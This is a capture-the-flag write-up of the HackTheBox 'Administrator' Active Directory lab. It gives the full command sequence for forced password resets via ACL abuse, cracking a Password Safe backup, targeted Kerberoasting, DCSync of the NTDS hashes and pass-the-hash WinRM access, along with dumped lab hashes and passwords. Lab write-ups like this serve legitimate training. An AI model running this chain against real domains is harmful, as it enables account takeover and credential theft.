Administrator - HackTheBox
Administrator - FullPowers!
Administrator is the 2nd box on HackTheBox, which presents an assumed breach scenario. I’m given credentials for a low-privileged user, olivia, which I’ll use to enumerate ACLs. I’ll discover that olivia has GenericAll over another user, michael; michael has Force Change Password on another user, benjamin, who has access to FTP. Upon resetting the password, I’ll access FTP and download the backup.psafe3 file, crack the password, and reveal credentials. I’ll discover that the emily user has a valid login password. I could use WinRM at this point to grab user.txt rather I’ll perform the next two steps to get Administrator.
emily has GenericWrite over ethan. I’ll perform targeted Kerberoasting to get his hash and crack it. ethan has DCsync rights, which I’ll abuse to get the administrator’s hash.
Recon
Nmap
I’ll start off with nmap.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-24 13:04:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
The only interesting port open is ftp which I don’t have creds to, I’ll get back to it later.
Auth and Enum as Olivia
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich
I’ll first generate the hosts file with nxc and then collect bloodhound data with bloodhound-ce-python.
1
2
3
4
➜ Administrator nxc smb 10.129.254.20 --generate-hosts-file hosts
SMB 10.129.254.20 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) (Null Auth:True)
➜ Administrator cat hosts| sudo tee -a /etc/hosts
10.129.254.20 DC.administrator.htb administrator.htb DC
1
2
3
4
5
6
➜ Administrator U=Olivia
➜ Administrator P=ichliebedich
➜ Administrator DOMAIN=administrator.htb
➜ Administrator IP=10.129.254.20
➜ Administrator sudo ntpdate 10.129.254.20
➜ Administrator bloodhound-ce-python -u $U -p $P -c All -d $DOMAIN --nameserver $IP --zip
FTP as Benjamin
I’ll mark olivia as owned and clicking on Shortest Path from Owned Objects leads me to a clear path for user benjamin.
I’ll first change the password of michael, and with michael’s new pass I’ll change the password of benjamin’s password who is member of Share Moderators hinting that he can access FTP.
Pass reset (net rpc)
michael:
1
$ net rpc password "michael" "newP@ssword2024" -U "administrator"/"olivia"%"ichliebedich" -S "DC.administrator.htb"
benjamin:
1
$ net rpc password "benjamin" "newP@ssword2025" -U "administrator"/"michael"%"newP@ssword2024" -S "DC.administrator.htb"
Pass reset (bloodyAD)
michael:
1
2
➜ Administrator bloodyAD --host "10.129.254.20" -d "administrator.htb" -u "olivia" -p "ichliebedich" set password "michael" "Password@123"
[+] Password changed successfully!
benjamin:
1
2
➜ Administrator bloodyAD --host "10.129.254.20" -d "Administrator.htb" -u "michael" -p "Password@123" set password "benjamin" "Password@123"
[+] Password changed successfully!
Now I can access FTP.
Auth / Shell as Emily
backup.psafe3
Looking through ftp, there is a .psafe3 backup file. I’ll download it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
➜ Administrator ftp [email protected]
Connected to DC.administrator.htb.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||58681|)
125 Data connection already open; Transfer starting.
10-05-24 09:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||58682|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************************************************************************| 952 8.51 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (8.43 KiB/s)
ftp>
psafe3 is database file for PasswordSafe (sudo apt install passwordsafe).
1
2
➜ Administrator file Backup.psafe3
Backup.psafe3: Password Safe V3 database
I can use pwsafe2john and crack the hash.
1
2
3
4
5
➜ Administrator pwsafe2john Backup.psafe3 > backup.hash
➜ Administrator john backup.hash -w=/usr/share/wordlists/rockyou.txt --fork=4
<SNIP>
tekieromucho (Backu)
<SNIP>
I’ll open the backup with pwsafe and export the passwords into plain text rather than copying each password manually.
1
2
➜ Administrator pwsafe Backup.psafe3
<Prompt for the password, I'll enter the pass and hit enter>
There are some passwords in this backup.
I’ll export them to plain text.
File > Export To > Plain Text (...) > Enter the password > click Ok > save it to the box's location.
1
2
3
4
➜ Administrator awk -F'\t' 'NR>1 {print $2, $3}' plain.txt
alexander UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma WwANQWnmJnGV07WQN8bMS7FMAbjNur
Only emily’s password is valid. which I can test quickly with nxc.
1
2
➜ Administrator nxc smb 10.129.254.20 -u users.txt -p pass.txt | grep -i "[+]"
SMB 10.129.254.20 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Shell as Administrator
I’ll mark emily as owned object and click on Shortest Path from Owned Object Looking at emily’s outbound control, emily has GenericWrite over ethan who hash DCSync rights.
I could change the password of ethan, rather I’ll do targeted Kerberoasting using targetedKerberoast.py from ShutDown.
1
2
3
4
5
6
7
➜ Administrator pythonx /opt/targetedKerberoast/targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip 10.129.254.20
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$f1f81fde248e1a392d6e85ceb3389b50$eeb07f189c7edd28bfd9d1f3bed68fb68f3223192894eca90e05632e40fb959df631c1a6d599c73c7a6335e9f2b4a24ebc9e8037b182797a979dc3fbc4a10a1cda48cbb9a73bdc5dd<SNIP>
[VERBOSE] SPN removed successfully for (ethan)
I’ll crack the hash with rockyou and John cracked the hash pretty fast.
1
2
3
4
5
➜ Administrator john ethan.hash -w=/usr/share/wordlists/rockyou.txt
<SNIP>
limpbizkit (?)
<SNIP>
Session completed.
DCSync
Having the password of ethan I’ll perform DCsync using nxc. Just by adding --ntds flag rather then typing whole command of secretsdump.py.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜ Administrator nxc smb 10.129.254.20 -u ethan -p limpbizkit --ntds
<SNIP>
SMB 10.129.254.20 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.254.20 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
SMB 10.129.254.20 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.254.20 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
SMB 10.129.254.20 445 DC administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
SMB 10.129.254.20 445 DC administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
SMB 10.129.254.20 445 DC administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
SMB 10.129.254.20 445 DC administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
SMB 10.129.254.20 445 DC administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
SMB 10.129.254.20 445 DC administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
SMB 10.129.254.20 445 DC administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
SMB 10.129.254.20 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
<SNIP>
root.txt & user.txt
I can grab root.txt and user.txt via nxc rather then using evil-winrm.
1
2
3
4
5
6
➜ Administrator nxc winrm 10.129.254.20 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e -X "type C:\Users\*\Desktop\*.txt"
WINRM 10.129.254.20 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM 10.129.254.20 5985 DC [+] administrator.htb\Administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!)
WINRM 10.129.254.20 5985 DC [+] Executed command (shell type: powershell)
WINRM 10.129.254.20 5985 DC 69884273ddb26c729c042e9c0d955104
WINRM 10.129.254.20 5985 DC 9a80efaffacad50b731e7282be0431e8
Thanks for reading the writeup.
